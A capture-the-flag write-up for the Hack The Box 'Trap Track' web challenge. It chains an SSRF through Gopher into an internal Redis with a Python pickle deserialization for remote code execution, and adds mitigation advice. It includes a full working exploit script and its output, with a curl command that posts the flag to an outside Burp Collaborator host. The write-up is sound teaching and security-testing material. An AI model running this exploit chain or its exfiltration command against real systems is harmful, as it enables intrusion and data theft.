Trap Track walkthrough - Cyber Apocalypse 2023

→ 1 Introduction

I previously wrote about participating in the Hack The Box Cyber Apocalypse 2023 CTF (Capture the Flag) competition.



This walkthrough covers the Trap Track challenge in the Web category, which was rated ‘hard’. The challenge is a white box web application assessment: the application source code was downloadable, along with build scripts for building and deploying the application locally as a Docker container.

The description of the challenge is shown below.

The key techniques employed in this walkthrough are:

- manual source code review

- SSRF (server-side request forgery) exploitation using the Gopher protocol

- Redis protocol analysis using Wireshark

- automating exploitation with a custom python3 script

- out-of-band exfiltration of data via Burp Collaborator

→ 2 Mapping the application

→ 2.1 Mapping the application via interaction



-



The target website was opened in the Burp browser, revealing a “TrapTrack Administration” login form

-



The simple credentials of

admin:adminwere tried and resulted in a successful login to the TrapTrack Administration page and the display of the/admin/page

-



As a basic test of the user interface functionality, the ‘Add Trap Track’ button was used to add a new Trap Track. This resulted in a POST to

/api/tracks/addbeing observed in Burp. Given the ability to submit an arbitrary URL, the question of what the application does with the URL arises. This could be probed by employing out-of-band testing techniques. However, given that source code is provided, source code analysis will be performed instead in later sections.


For brevity, further exploration of the UI is omitted from this walkthrough as it was of little consequence.

→ 2.2 Mapping the application via source code review

To support the interactive mapping and to easily discover hidden endpoints, further mapping of the application was conducted via source code review.

- From the Dockerfile, the following was observed:

  - A python3 base image is used, so the application is likely implemented in Python 3.

  - The flag is located in /root/flag, which is typically only readable by the root user. Furthermore, obtaining the flag requires exploiting a remote code execution vulnerability in order to execute /readflag, which is a good hint as to the expected attack vector:

    COPY config/readflag.c /
    # Setup flag reader
    RUN gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c

    config/readflag.c reads the flag as the root user and prints it to standard out. This works because /readflag is built during the image build (by default as root) and mode 4755 sets the setuid bit, so the binary runs with root's privileges regardless of which user executes it.

  - Python dependencies declared in /app/requirements.txt are installed.

  - The Docker container runs the application via supervisord, which is a “client/server system that allows its users to monitor and control a number of processes on UNIX-like operating systems”.

- config/supervisord.conf indicates that three processes are running: two Python processes, program:flask on line 8 and program:worker on line 24, and one Redis server, program:redis, on line 17. Both Python processes run as the unprivileged www-data user, which is consistent with the need for the setuid /readflag binary to read the flag.

  [supervisord]
  user=root
  nodaemon=true
  logfile=/dev/null
  logfile_maxbytes=0
  pidfile=/run/supervisord.pid

  [program:flask]
  user=www-data
  command=python /app/run.py
  autorestart=true
  stdout_logfile=/dev/stdout
  stdout_logfile_maxbytes=0
  stderr_logfile=/dev/stderr
  stderr_logfile_maxbytes=0

  [program:redis]
  user=redis
  command=redis-server /etc/redis/redis.conf
  autostart=true
  logfile=/dev/null
  logfile_maxbytes=0

  [program:worker]
  user=www-data
  command=python /app/worker/main.py
  autorestart=true
  stdout_logfile=/dev/stdout
  stdout_logfile_maxbytes=0
  stderr_logfile=/dev/stderr
  stderr_logfile_maxbytes=0

- run.py imports app from application.main on line 1, then runs it on line 8.

- application/main.py defines a Flask application (Flask being a Python web application framework) on line 8 and registers blueprints, which are a way of grouping views and their associated URLs, on lines 23-24. Notably, a Redis client is also instantiated on line 11.

  from flask import Flask
  from application.blueprints.routes import web, api, response
  from application.database import db, User
  from flask_login import LoginManager
  from flask_session import Session
  import redis

  app = Flask(__name__)
  app.config.from_object('application.config.Config')

  app.redis = redis.StrictRedis(host=app.config['REDIS_HOST'], port=app.config['REDIS_PORT'], db=0)
  app.redis.flushdb()
  app.redis.getset(app.config['REDIS_NUM_JOBS'], 100)

  db.init_app(app)

  login_manager = LoginManager()
  login_manager.init_app(app)

  sess = Session()
  sess.init_app(app)

  app.register_blueprint(web, url_prefix='/')
  app.register_blueprint(api, url_prefix='/api')

- application/blueprints/routes.py defines two sets of routes:

  - unauthenticated routes, which had already been observed during interactive application mapping

  - authenticated routes, of which /admin/ and /tracks/add had already been observed; the remaining routes relate to track CRUD operations, plus an uninteresting /logout route.

→ 3 Vulnerability analysis

→ 3.1 Manual source code review

To determine what the application does with the payload submitted to the /api/tracks/add route, especially the URL, a manual review of the source code was conducted.





The /api/tracks/add route creates a job queue for the trap on line 67 in routes.py.



The create_job_queue function in application/cache.py sets the trapName and trapURL in a Python dictionary on line 25, then persists the base64-encoded pickle of that dictionary to the Redis data store using the HSET command on line 34. Next, a corresponding job is added to a queue using the RPUSH command on line 36. The use of pickle serialization is notable, as it indicates a potential deserialization vulnerability, an instance of the common weakness CWE-502: Deserialization of Untrusted Data, if an attacker can control the data persisted to Redis.
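To make the risk concrete, the following minimal sketch (not taken from the challenge code) shows how unpickling runs code: pickle.loads calls whatever callable an object's __reduce__ method returns, with the arguments it returns. The class name Gadget is hypothetical, and a harmless os.getcwd call stands in for a shell command.

```python
import os
import pickle
import pickletools


class Gadget:
    """Hypothetical class whose __reduce__ tells pickle to rebuild it by
    calling an arbitrary callable with arbitrary arguments."""

    def __reduce__(self):
        # Harmless stand-in for a shell command; a real payload would return
        # something like (subprocess.check_output, (cmd,)).
        return (os.getcwd, ())


payload = pickle.dumps(Gadget(), protocol=4)

# The pickle references the callable by module and name (STACK_GLOBAL),
# then the REDUCE opcode calls it with the argument tuple.
opcode_names = [op.name for op, _arg, _pos in pickletools.genops(payload)]
print(opcode_names)

# Unpickling never recreates a Gadget: it returns whatever os.getcwd() returns,
# i.e. the callable was executed during deserialization.
result = pickle.loads(payload)
print(result)
```

Nothing about the Gadget class itself is needed at load time; the pickle only names the callable, which is why any application that unpickles attacker-controlled bytes is exposed.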

A good reference for mitigating this type of vulnerability is the OWASP Deserialization Cheat Sheet. The cheat sheet recommends using a data-only serialization format such as JSON instead, which is sound advice; note, however, that the Python json module documentation contains this warning:

Be cautious when parsing JSON data from untrusted sources. A malicious JSON string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended.

An additional mitigation measure would be to validate that the data conforms to an expected schema, for example by using JSON Schema.
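As a rough illustration of these mitigations, the sketch below stores a job as JSON, rejects oversized input before parsing it, and checks the decoded object against a fixed set of fields and types. The field names mirror the job dictionary recovered in section 3.5; the size limit, the schema dictionary and the function names are assumptions, and the hand-rolled type check is a simplified stand-in for a real JSON Schema validator.

```python
import json

MAX_JOB_BYTES = 4096  # hypothetical upper bound on a serialized job

# Hypothetical schema: the job fields seen in the captured pickle and their types.
JOB_SCHEMA = {
    "job_id": int,
    "trap_name": str,
    "trap_url": str,
    "completed": int,
    "inprogress": int,
    "health": int,
}


def validate_job(job) -> dict:
    """Raise ValueError unless job is a dict with exactly the expected fields and types."""
    if not isinstance(job, dict):
        raise ValueError("job must be a JSON object")
    if set(job) != set(JOB_SCHEMA):
        raise ValueError(f"unexpected or missing fields: {sorted(set(job) ^ set(JOB_SCHEMA))}")
    for field, expected_type in JOB_SCHEMA.items():
        value = job[field]
        # bool is a subclass of int, so reject it explicitly.
        if isinstance(value, bool) or not isinstance(value, expected_type):
            raise ValueError(f"{field} must be of type {expected_type.__name__}")
    return job


def serialize_job(job: dict) -> str:
    return json.dumps(validate_job(job))


def deserialize_job(raw: str) -> dict:
    # Check the size before parsing, per the json module's warning about untrusted input.
    if len(raw.encode("utf-8")) > MAX_JOB_BYTES:
        raise ValueError("serialized job is too large")
    return validate_job(json.loads(raw))
```

Unlike pickle, json.loads can only ever produce dicts, lists, strings, numbers, booleans and None, so even a tampered Redis value cannot trigger code execution; the schema check then catches structurally wrong data.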






The pickled data is deserialized in two locations:

The get_job_queue function in application/cache.py deserializes the pickled Python object and returns it. get_job_queue is in turn called by the /tracks/<int:job_id>/status route in routes.py, which simply encodes the data as JSON and returns it in the HTTP response.





The get_work_item function in worker/main.py gets the next item from the job queue, then deserializes the job as a pickled Python object and returns it. get_work_item is in turn called by the worker process every 10 seconds; in other words, the job queue is polled every 10 seconds.



Furthermore, the trapURL is requested on line 52. The request is implemented in worker/healthcheck.py, which uses pycurl to make the request.

Because the requested URL is not validated, this gives rise to a Server-Side Request Forgery vulnerability, an instance of the common weakness CWE-918: Server-Side Request Forgery (SSRF). SSRF vulnerabilities can be exploited to make the server send requests to internal services that an attacker cannot otherwise reach. In this instance, the application is known to use an internal Redis data store, and by default the Redis endpoint is insecure:

“By default Redis binds to all the interfaces and has no authentication at all”.

The main complication in exploiting an SSRF vulnerability against an internal Redis endpoint is that Redis does not speak HTTP; it uses its own protocol, RESP (REdis Serialization Protocol). However, RESP has the following characteristics, which make it practical to craft by hand:

- It is human readable; in other words, it is text based.

- It is binary-safe, since bulk strings are length-prefixed rather than delimited.

Additionally, pycurl is a “Python interface to libcurl”, and libcurl supports the Gopher protocol. Gopher is particularly useful for SSRF attacks because libcurl sends the URL-decoded path of a gopher:// URL over a plain TCP connection to the chosen host and port, which allows requests in other text-based protocols, such as HTTP or RESP, to be crafted.
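The following sketch shows how an arbitrary text payload can be wrapped in a gopher:// URL. It assumes libcurl's Gopher behavior: the first character of the path after the slash is treated as the Gopher item type and discarded, and the remainder is URL-decoded and sent over TCP followed by CRLF. Both helper names are hypothetical, and approx_sent_text only approximates what libcurl puts on the wire.

```python
from urllib.parse import quote, unquote, urlsplit


def gopher_url_for(host: str, port: int, raw_payload: str, item_type: str = "x") -> str:
    """Wrap a raw text-protocol payload in a gopher:// URL (hypothetical helper)."""
    # safe="" percent-encodes every reserved character, including "/", "?" and "#",
    # so the payload cannot be mistaken for URL structure.
    return f"gopher://{host}:{port}/{item_type}{quote(raw_payload, safe='')}"


def approx_sent_text(url: str) -> str:
    """Approximate what libcurl sends for a gopher URL, assuming it drops the "/"
    and the item-type character, URL-decodes the rest and appends CRLF."""
    selector = unquote(urlsplit(url).path[2:])
    return selector + "\r\n"


if __name__ == "__main__":
    http_request = "GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n"
    url = gopher_url_for("example.com", 80, http_request)
    print(url)
    print(repr(approx_sent_text(url)))
```

The same wrapper works for any line-oriented protocol; only the payload changes, which is what makes Gopher such a flexible SSRF primitive.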

A good reference for mitigating this type of vulnerability is the OWASP Server-Side Request Forgery Prevention Cheat Sheet. In this instance, an additional defense-in-depth measure would be to replace pycurl with an implementation that only supports the HTTP protocol.
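For the SSRF side, a minimal pre-flight check in the spirit of the OWASP cheat sheet might allow only http and https and refuse any host that resolves to an internal address. This is a sketch with a hypothetical function name, not a complete defense.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_safe_trap_url(url: str) -> bool:
    """Hypothetical pre-flight check for a user-supplied trapURL."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    # Refuse gopher://, file://, dict:// and anything else that is not HTTP(S).
    if scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        default_port = 443 if scheme == "https" else 80
        infos = socket.getaddrinfo(parts.hostname, parts.port or default_port,
                                   type=socket.SOCK_STREAM)
    except (socket.gaierror, ValueError):
        # Unresolvable host, or an invalid port such as ":99999".
        return False
    for *_, sockaddr in infos:
        # Strip any IPv6 zone id (e.g. "fe80::1%eth0") before parsing.
        addr = ipaddress.ip_address(sockaddr[0].split("%")[0])
        # A single internal address is enough to refuse the URL.
        if (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_reserved or addr.is_multicast or addr.is_unspecified):
            return False
    return True
```

A check like this rejects the Gopher payloads used later in this walkthrough outright. It remains vulnerable to DNS rebinding, because pycurl resolves the host again when it makes the request, and to redirects if redirect following is enabled, so it complements rather than replaces restricting the client to HTTP.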


→ 3.2 Attack chain hypothesis

Given the existence of both a deserialization vulnerability and an SSRF vulnerability, the attack chain for exploiting the application was theorized as follows:

- Add a trapURL consisting of a Gopher URL which exploits the SSRF vulnerability to invoke the Redis endpoint directly and persist (via HSET) a Python pickle containing an RCE payload.

- Add another trapURL, also a Gopher URL, which invokes the Redis endpoint directly and pushes (via RPUSH) the job persisted in the previous step onto the Redis queue that the worker process polls.

- When the worker process picks up the job, it deserializes the pickled object, exploiting the deserialization vulnerability. The deserialized object invokes the /readflag binary and sends the result to an external Burp Collaborator URL.

→ 3.3 Deploying the application locally

To confirm the attack chain, the provided build script was used to build the application and start it locally in a Docker container:

$ sudo ./build-docker.sh

→ 3.4 Confirming the SSRF vulnerability and the use of the Gopher protocol

A simple Gopher URL was submitted as the trapURL to /api/tracks/add, where the Gopher URL sends an HTTP request to Burp Collaborator (http://9akl0jvvkadjinxalbr6648mpdv4ju7j.oastify.com):

$ curl -i -s -k --proxy 127.0.0.1:8080 -X POST -H 'Content-Type: application/json' -b 'session=e76923a9-ea38-427a-8a30-1bbee20aa033' --data-binary '{"trapName":"gopher 1","trapURL":"gopher://jj6v9t45tkmtrx6kul0gfehwyn4es6gv.oastify.com:80/xGET%20/%20HTTP/1.1%0d%0aHost:%209akl0jvvkadjinxalbr6648mpdv4ju7j.oastify.com%0d%0aConnection:%20close%0d%0a%0d%0a"}' http://127.0.0.1:1337/api/tracks/add

HTTP/1.1 200 OK

Server: Werkzeug/2.2.3 Python/3.8.14

Date: Wed, 29 Mar 2023 02:22:54 GMT

Content-Type: application/json

Content-Length: 45

Set-Cookie: session=e76923a9-ea38-427a-8a30-1bbee20aa033; HttpOnly; Path=/

Connection: close



{"message":"Trap Track added successfully!"}Shortly thereafter, a corresponding Burp Collaborator request was observed, confirming both the SSRF vulnerability and that the Gopher protocol can be used to submit an HTTP request to an external URL.

→ 3.5 Confirming the Redis request format

Next, the format of the Redis requests that persist jobs and push them onto the Redis queue was analyzed by capturing network packets from the local Docker instance. Under the hood, Docker uses Linux namespaces to provide each container with a limited view of the operating system's resources. From the underlying host operating system, the nsenter command can be used to run commands within the same namespaces as a running Docker container.

The process ID of the running Docker container was first identified:

$ sudo docker container ls

CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES

b9e2e9d1f25a web_traptrack "/usr/bin/supervisor…" 45 minutes ago Up 45 minutes web_traptrack

$ sudo docker container inspect web_traptrack|jq '.[]|.State.Pid'

67836

nsenter was then used to run Wireshark within the network namespace of the Docker container. The -t option specifies the target process ID (that of the Docker container), whilst the -n option specifies that only the network namespace of that process is entered. The rest of the command line is the Wireshark command and its options:

- -i lo: capture traffic from the lo (loopback) interface, i.e. localhost. Note that this is the localhost within the Docker container's network namespace, which is different from the localhost of the underlying host OS

- -f 'port 6379': only capture traffic to and from the Redis port, 6379

- -k: start capturing traffic immediately

$ sudo nsenter -t 67836 -n wireshark -i lo -f 'port 6379' -k &

A basic trap was submitted with a dummy URL, http://example.com, as follows:

$ curl -i -s -k --proxy 127.0.0.1:8080 -X POST -H 'Content-Type: application/json' -b 'session=e76923a9-ea38-427a-8a30-1bbee20aa033' --data-binary '{"trapName":"example","trapURL":"http://example.com" }' http://127.0.0.1:1337/api/tracks/add

HTTP/1.1 200 OK
Server: Werkzeug/2.2.3 Python/3.8.14
Date: Wed, 29 Mar 2023 03:09:13 GMT
Content-Type: application/json
Content-Length: 45
Set-Cookie: session=e76923a9-ea38-427a-8a30-1bbee20aa033; HttpOnly; Path=/
Connection: close

{"message":"Trap Track added successfully!"}





Two Redis requests were observed in Wireshark, corresponding to the HSET and RPUSH commands. The HSET command is a plaintext RESP request sent over TCP, consisting of lines each terminated by a carriage return and line feed (0d0a). Based on the HSET command documentation and these observations, the request appears to have the following structure:

*4            # there are 4 array elements
$4            # next string is 4 bytes long
HSET          # command name
$4            # next string is 4 bytes long
jobs          # key name
$3            # next string is 3 bytes long
102           # job id as a field name
$164          # next string is 164 bytes long
gASVbgA ...   # field value: base64 encoded Python 3 pickle
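The structure above generalizes to any Redis command: a RESP array header followed by one length-prefixed bulk string per argument, each terminated by CRLF. The sketch below (the function name is hypothetical) encodes a command this way; note that the declared lengths are byte counts, not character counts.

```python
def encode_resp_command(*args: str) -> bytes:
    """Encode a Redis command as a RESP array of bulk strings."""
    # Array header: "*" followed by the number of elements.
    out = [b"*%d\r\n" % len(args)]
    for arg in args:
        data = arg.encode("utf-8")
        # Bulk string: "$" + byte length, CRLF, the raw bytes, CRLF.
        out.append(b"$%d\r\n%s\r\n" % (len(data), data))
    return b"".join(out)


if __name__ == "__main__":
    print(encode_resp_command("RPUSH", "jobqueue", "200"))
```

The RPUSH output matches the payload hard coded in the exploit script in section 4.1, while that script's HSET payload omits the final CRLF and relies on libcurl appending one after the Gopher selector.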

The base64 field value was copied as hex, then decoded into a file:

$ echo -n '674153566267414141414141414142396c43694d426d7076596c39705a4a524c5a6f774a64484a68634639755957316c6c4977485a586868625842735a5a534d434852795958426664584a736c4977536148523063446f764c3256345957317762475575593239746c49774a593239746347786c6447566b6c4573416a417070626e4279623264795a584e7a6c4573416a415a6f5a57467364476955537742314c673d3d' |xxd -r -p |base64 -d>redis-hset.bin
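If xxd is not available, the same decoding can be done in Python. This hypothetical helper strips whitespace from the hex dump, converts it back to the base64 text, and base64-decodes that into the raw pickle bytes.

```python
import base64
import binascii


def decode_hex_base64(hex_dump: str) -> bytes:
    """Python equivalent of `xxd -r -p | base64 -d` for a hex-copied base64 value."""
    # Remove any whitespace or line breaks introduced when copying the hex dump.
    base64_text = binascii.unhexlify("".join(hex_dump.split()))
    # validate=True rejects stray non-base64 characters instead of silently skipping them.
    return base64.b64decode(base64_text, validate=True)


if __name__ == "__main__":
    # "67415356" is the hex for "gASV", the base64 of a protocol 4 pickle header.
    print(decode_hex_base64("67415356"))
```

The decoded bytes can then be written to a file or passed straight to pickletools.dis for inspection, without ever calling pickle.loads on them.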

The payload was confirmed to be a pickled Python object, corresponding to the Python dictionary persisted on line 34 in application/cache.py:

$ python3 -mpickletools -a redis-hset.bin
0: \x80 PROTO 4 Protocol version indicator.
2: \x95 FRAME 110 Indicate the beginning of a new frame.
11: } EMPTY_DICT Push an empty dict.
12: \x94 MEMOIZE (as 0) Store the stack top into the memo. The stack is not popped.
13: ( MARK Push markobject onto the stack.
14: \x8c SHORT_BINUNICODE 'job_id' Push a Python Unicode string object.
22: \x94 MEMOIZE (as 1) Store the stack top into the memo. The stack is not popped.
23: K BININT1 102 Push a one-byte unsigned integer.
25: \x8c SHORT_BINUNICODE 'trap_name' Push a Python Unicode string object.
36: \x94 MEMOIZE (as 2) Store the stack top into the memo. The stack is not popped.
37: \x8c SHORT_BINUNICODE 'example' Push a Python Unicode string object.
46: \x94 MEMOIZE (as 3) Store the stack top into the memo. The stack is not popped.
47: \x8c SHORT_BINUNICODE 'trap_url' Push a Python Unicode string object.
57: \x94 MEMOIZE (as 4) Store the stack top into the memo. The stack is not popped.
58: \x8c SHORT_BINUNICODE 'http://example.com' Push a Python Unicode string object.
78: \x94 MEMOIZE (as 5) Store the stack top into the memo. The stack is not popped.
79: \x8c SHORT_BINUNICODE 'completed' Push a Python Unicode string object.
90: \x94 MEMOIZE (as 6) Store the stack top into the memo. The stack is not popped.
91: K BININT1 0 Push a one-byte unsigned integer.
93: \x8c SHORT_BINUNICODE 'inprogress' Push a Python Unicode string object.
105: \x94 MEMOIZE (as 7) Store the stack top into the memo. The stack is not popped.
106: K BININT1 0 Push a one-byte unsigned integer.
108: \x8c SHORT_BINUNICODE 'health' Push a Python Unicode string object.
116: \x94 MEMOIZE (as 8) Store the stack top into the memo. The stack is not popped.
117: K BININT1 0 Push a one-byte unsigned integer.
119: u SETITEMS (MARK at 13) Add an arbitrary number of key+value pairs to an existing dict.
120: . STOP Stop the unpickling machine.

highest protocol among opcodes = 4
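As a cross-check, a plain dictionary with the same keys and values can be pickled locally. This is a hypothetical reconstruction based only on the pickletools output above, assuming the application pickles a plain dict with protocol 4 (the default in Python 3.8) and base64-encodes the result; it is not the application's actual create_job_queue code.

```python
import base64
import pickle
import pickletools

# Hypothetical reconstruction of the job dictionary, using the keys and values
# visible in the pickletools output above.
job = {
    "job_id": 102,
    "trap_name": "example",
    "trap_url": "http://example.com",
    "completed": 0,
    "inprogress": 0,
    "health": 0,
}

# Protocol 4 is pinned explicitly because newer Python versions may default higher.
pickled = pickle.dumps(job, protocol=4)
encoded = base64.b64encode(pickled)

print(len(pickled), len(encoded))
print(encoded.decode())
pickletools.dis(pickled, annotate=1)
```

The 121-byte pickle base64-encodes to 164 characters, which matches the $164 bulk string length observed in the HSET request.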

The RPUSH command is also a plaintext RESP request which, in this instance, pushed the job id 102 onto the jobqueue list.

→ 4 Exploitation

→ 4.1 Local exploitation via a custom Python script

To ease exploitation of the SSRF and deserialization vulnerabilities, and allow reproducibility against both the local Docker container and the remote target, a python3 script was written. Verbose comments have been included to document the script.

#!/usr/bin/python3
# Exploit script for Hack the Box 2023 Cyber Apocalypse Web Challenge 'Trap Track'
#
# Before running:
# 1. Change the target variable to the remote/local target
# 2. Change the Burp Collaborator URL in the shell_cmd variable
#
# Run:
# ./exploit.py
#
# Attack summary: SSRF via adding a trapURL allows us to hit the internal Redis endpoint.
# That endpoint is hit via a Python curl wrapper, which supports the Gopher protocol. Gopher
# allows us to submit non-HTTP requests, which is useful since Redis uses its own non-HTTP
# plaintext serialization protocol. So we store a Pickle payload into Redis directly and add
# a job to a queue via the same means. A worker process in the app later pops the job from
# the queue, then deserializes and executes the Pickle payload.

import base64
import pickle
import subprocess
import sys
import time
import urllib.parse
from functools import partial

import requests

# Shell command to be executed. It invokes the /readflag binary and posts the resulting
# standard out to a Burp Collaborator endpoint.
shell_cmd = 'curl -XPOST --data-raw "$(/readflag)" http://8z8kpiku992i7mm9aag5v3xleck38wwl.oastify.com'

# The host:port to submit the SSRF payload to.
target = '127.0.0.1:1337'
#target = '139.59.176.230:30610'


# Simple class to be pickled which will execute a given shell command upon deserialization
class RCE(object):
    def __init__(self, cmd):
        self._cmd = cmd

    def __reduce__(self):
        # On unpickling, the returned callable is invoked with the (empty) argument tuple,
        # i.e. subprocess.check_output(cmd, shell=True) runs.
        # This general form works on both python2 and python3
        return (partial(subprocess.check_output, self._cmd, shell=True), ())


# Given a shell command, return an RCE pickled object as base64 encoded bytes
def create_pickled_rce_b64(shell_cmd):
    obj_to_pickle = RCE(shell_cmd)
    pickled_rce = pickle.dumps(obj_to_pickle)
    pickled_rce_b64 = base64.b64encode(pickled_rce)
    print(f"pickled_rce: {pickled_rce}")
    print(f"pickled_rce b64: {pickled_rce_b64}")
    return pickled_rce_b64


# Given a pickled object as base64 encoded bytes, return a Redis RESP payload for the HSET
# command which sets a job to the value of the payload. The job has a hard coded id of 200.
# No trailing \r\n is added after the value: libcurl's Gopher handler appends \r\n after
# the selector, which terminates the final bulk string.
def create_redis_set_job_payload(pickled_rce_b64_bytes):
    pickled_rce_b64_str = str(pickled_rce_b64_bytes, 'utf-8')
    redis_set_job_payload = f"*4\r\n$4\r\nHSET\r\n$4\r\njobs\r\n$3\r\n200\r\n${len(pickled_rce_b64_str)}\r\n{pickled_rce_b64_str}"
    print(f"redis_set_job_payload: {redis_set_job_payload}")
    return redis_set_job_payload


# Return a Redis RESP payload for the RPUSH command with the hard coded job id of 200 to be
# pushed onto the jobqueue
def create_redis_push_job_payload():
    redis_push_job_payload = "*3\r\n$5\r\nRPUSH\r\n$8\r\njobqueue\r\n$3\r\n200\r\n"
    print(f"redis_push_job_payload: {redis_push_job_payload}")
    return redis_push_job_payload


# Returns a gopher URL for the host and port, containing the given payload. The leading "x"
# is a placeholder Gopher item type, which libcurl strips before sending the rest of the path.
def create_gopher_url(host_and_port, payload):
    escaped_payload = urllib.parse.quote_plus(payload)
    gopher_url = f"gopher://{host_and_port}/x{escaped_payload}"
    print(f"gopher_url: {gopher_url}")
    return gopher_url


# Get the home page of the application
def get_home(session):
    resp = session.get(f"http://{target}/")
    if resp.status_code != 200:
        print(f"get_home resp.status_code: {resp.status_code}")
        sys.exit(1)


# Log into the application
def login(session):
    resp = session.post(f"http://{target}/api/login", json={"username": "admin", "password": "admin"}, headers={'Content-Type': 'application/json'})
    if resp.status_code != 200:
        print(f"login resp.status_code: {resp.status_code}")
        sys.exit(1)


# Post the given payload as the trapURL to the /api/tracks/add route
def submit_payload(session, payload):
    resp = session.post(f"http://{target}/api/tracks/add", json={"trapName": "exploit", "trapURL": payload}, headers={'Content-Type': 'application/json'})
    if resp.status_code != 200:
        print(f"submit_payload resp.status_code: {resp.status_code}")
        sys.exit(1)


# The internal Redis endpoint, as reached from inside the target container
redis_host_and_port = '127.0.0.1:6379'

# Burp proxy
proxy = "127.0.0.1:8080"
proxies = {'http': proxy, 'https': proxy}

# HTTP session
session = requests.Session()
session.proxies = proxies

# Log in so that we can submit requests to the authenticated /api/tracks/add route
get_home(session)
login(session)

# Submit a track containing the payload for persisting a pickled shell command as a new job,
# with an id of 200 hard coded in the create_redis_set_job_payload function
pickled_rce_b64_bytes = create_pickled_rce_b64(shell_cmd)
redis_set_job_payload_str = create_redis_set_job_payload(pickled_rce_b64_bytes)
gopher_url = create_gopher_url(redis_host_and_port, redis_set_job_payload_str)
submit_payload(session, gopher_url)

# Wait for the submitted track to be picked up and executed, which will persist our pickle
# as job 200. The worker polls the job queue every 10 seconds, so 15 seconds leaves a margin.
time.sleep(15)

# Submit a track containing the payload for pushing the above job 200 onto the job queue
# so the worker process will pick it up and process it, where the job id of 200 is hard coded
# in the create_redis_push_job_payload function
redis_push_job_payload_str = create_redis_push_job_payload()
gopher_url = create_gopher_url(redis_host_and_port, redis_push_job_payload_str)
submit_payload(session, gopher_url)

session.close()

The script was executed:

$ ./exploit.py
pickled_rce: b'\x80\x04\x95\xaf\x00\x00\x00\x00\x00\x00\x00\x8c\tfunctools\x94\x8c\x07partial\x94\x93\x94\x8c\nsubprocess\x94\x8c\x0ccheck_output\x94\x93\x94\x85\x94R\x94(h\x05\x8cYcurl -XPOST --data-raw "$(/readflag)" http://8z8kpiku992i7mm9aag5v3xleck38wwl.oastify.com\x94\x85\x94}\x94\x8c\x05shell\x94\x88sNt\x94b)R\x94.'
pickled_rce b64: b'gASVrwAAAAAAAACMCWZ1bmN0b29sc5SMB3BhcnRpYWyUk5SMCnN1YnByb2Nlc3OUjAxjaGVja19vdXRwdXSUk5SFlFKUKGgFjFljdXJsIC1YUE9TVCAtLWRhdGEtcmF3ICIkKC9yZWFkZmxhZykiIGh0dHA6Ly84ejhrcGlrdTk5Mmk3bW05YWFnNXYzeGxlY2szOHd3bC5vYXN0aWZ5LmNvbZSFlH2UjAVzaGVsbJSIc050lGIpUpQu'
redis_set_job_payload: *4
$4
HSET
$4
jobs
$3
200
$248
gASVrwAAAAAAAACMCWZ1bmN0b29sc5SMB3BhcnRpYWyUk5SMCnN1YnByb2Nlc3OUjAxjaGVja19vdXRwdXSUk5SFlFKUKGgFjFljdXJsIC1YUE9TVCAtLWRhdGEtcmF3ICIkKC9yZWFkZmxhZykiIGh0dHA6Ly84ejhrcGlrdTk5Mmk3bW05YWFnNXYzeGxlY2szOHd3bC5vYXN0aWZ5LmNvbZSFlH2UjAVzaGVsbJSIc050lGIpUpQu
gopher_url: gopher://127.0.0.1:6379/x%2A4%0D%0A%244%0D%0AHSET%0D%0A%244%0D%0Ajobs%0D%0A%243%0D%0A200%0D%0A%24248%0D%0AgASVrwAAAAAAAACMCWZ1bmN0b29sc5SMB3BhcnRpYWyUk5SMCnN1YnByb2Nlc3OUjAxjaGVja19vdXRwdXSUk5SFlFKUKGgFjFljdXJsIC1YUE9TVCAtLWRhdGEtcmF3ICIkKC9yZWFkZmxhZykiIGh0dHA6Ly84ejhrcGlrdTk5Mmk3bW05YWFnNXYzeGxlY2szOHd3bC5vYXN0aWZ5LmNvbZSFlH2UjAVzaGVsbJSIc050lGIpUpQu
redis_push_job_payload: *3
$5
RPUSH
$8
jobqueue
$3
200

gopher_url: gopher://127.0.0.1:6379/x%2A3%0D%0A%245%0D%0ARPUSH%0D%0A%248%0D%0Ajobqueue%0D%0A%243%0D%0A200%0D%0A
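Before firing a payload at a remote target, it can be worth checking that the generated Gopher URLs decode back into well-formed RESP, in particular that each declared bulk string length (such as $248) matches the data. The sketch below uses hypothetical helper names; it reverses create_gopher_url, assuming libcurl drops the leading item-type character and appends CRLF to the selector, and then parses the RESP array.

```python
from urllib.parse import unquote, urlsplit


def resp_from_gopher_url(url: str) -> bytes:
    # Drop "/" and the Gopher item type, URL-decode, and add the CRLF that
    # libcurl is assumed to append after the selector.
    return unquote(urlsplit(url).path[2:]).encode() + b"\r\n"


def parse_resp_array(data: bytes) -> list:
    """Parse one RESP array of bulk strings, checking each declared length."""
    if not data.startswith(b"*"):
        raise ValueError("expected a RESP array")
    header, _, rest = data.partition(b"\r\n")
    items = []
    for _ in range(int(header[1:])):
        if not rest.startswith(b"$"):
            raise ValueError("expected a bulk string")
        length_line, _, rest = rest.partition(b"\r\n")
        length = int(length_line[1:])
        value, rest = rest[:length], rest[length:]
        if len(value) != length:
            raise ValueError("bulk string shorter than its declared length")
        # Each bulk string must be followed by CRLF.
        if not rest.startswith(b"\r\n"):
            raise ValueError("missing CRLF after bulk string")
        items.append(value.decode())
        rest = rest[2:]
    return items


if __name__ == "__main__":
    url = "gopher://127.0.0.1:6379/x%2A3%0D%0A%245%0D%0ARPUSH%0D%0A%248%0D%0Ajobqueue%0D%0A%243%0D%0A200%0D%0A"
    print(parse_resp_array(resp_from_gopher_url(url)))
```

Any trailing bytes after the array (such as the extra CRLF following the RPUSH payload) are ignored here, in the same way Redis treats an empty line as a no-op.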



A callback containing the (fake) local flag was observed in Burp Collaborator:



→ 4.2 Remote exploitation of the real target

Similarly, the script was executed against the remote target and the flag was obtained via Burp Collaborator:

→ 5 Conclusion

The flag was submitted and the challenge was marked as pwned.